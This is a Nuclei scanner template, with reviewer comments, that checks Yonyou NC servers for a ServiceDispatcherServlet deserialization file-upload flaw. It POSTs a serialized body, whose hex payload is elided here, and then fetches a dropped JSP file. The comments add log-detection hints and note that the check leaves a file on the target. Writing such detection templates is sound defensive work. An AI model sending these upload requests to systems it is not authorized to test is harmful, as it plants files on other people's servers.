nuclei-templates/http/vulnerabilities/yonyou/yonyou-nc-dispatcher-fileup...

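# Nuclei HTTP template: checks a Yonyou NC instance for the
# ServiceDispatcherServlet deserialization file-upload issue described in the
# reference below. Nesting and blank lines are restored here; the listing had
# lost them, and the blame timestamps between lines were not template content.
id: yonyou-nc-dispatcher-fileupload

info:
  name: Yonyou NC ServiceDispatcher Servlet - Arbitrary File Upload
  author: SleepingBag945
  severity: critical
  description: |
    Yonyou NC ServiceDispatcherServlet deserialization file upload vulnerability.
  reference:
    - https://github.com/lal0ne/vulnerability/blob/c0985107adfd91d85fbd76d9a8acf8fbfa98ed41/YonyouNC/ncDecode/README.md
  metadata:
    verified: true
    # Equals the number of raw requests defined under http.
    max-request: 2
    fofa-query: icon_hash="1085941792"
  # "intrusive": this is not a passive check. The match depends on reading
  # back /ncupload/n2d19a.jsp, so a positive result means that file now exists
  # on the scanned host and stays there until it is removed.
  tags: yonyou,intrusive,fileupload

http:
  - raw:
      # Request 1: POST of a hex-decoded body to the dispatcher servlet.
      # The empty line inside the block separates HTTP headers from the body.
      # NOTE(review): the hex_decode argument is elided in this listing, so
      # the template is not usable as shown.
      # Detection: this request shape (POST /ServiceDispatcherServlet with
      # Content-Type application/data) followed by a first-seen .jsp under
      # /ncupload/ is what to look for in web and proxy logs.
      - |
        POST /ServiceDispatcherServlet HTTP/1.1
        Content-Type: application/data
        Host: {{Hostname}}
        Accept: text/html, image/gif, image/jpeg, *; q=.2, */*; q=.2

        {{hex_decode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}}
      # Request 2: fetch the fixed file name that the matcher expects to find.
      - |
        GET /ncupload/n2d19a.jsp HTTP/1.1
        Host: {{Hostname}}

    # matchers-condition combines matchers (only one is defined); the inner
    # "condition" combines the two dsl expressions.
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          # Request 1 was answered with 200.
          - "status_code_1 == 200"
          # Request 2 returned 200 and the marker string is in its body.
          # File name and marker are fixed, so a copy left by an earlier run
          # also satisfies this expression; whether a fixed server still
          # answers request 1 with 200 cannot be told from this page, so
          # re-confirm hits on hosts that were scanned before.
          - "status_code_2 == 200 && contains(body_2,'just_a_test')"
        condition: and
# The digest below is the signing trailer of the published template.
# NOTE(review): it was presumably computed over the original text, so a copy
# edited locally (including these comments) needs re-signing to verify.
# digest: 4b0a00483046022100b133fa848f0dfa29959a4593e87849235eec2ba638a6b83ab7726c39748bb592022100b4ef8f4f815d5b12f118f5770b9b7dee0d102fa7942007358ba698c3ac5d932d:922c64590222798bb761d5b6d8e72950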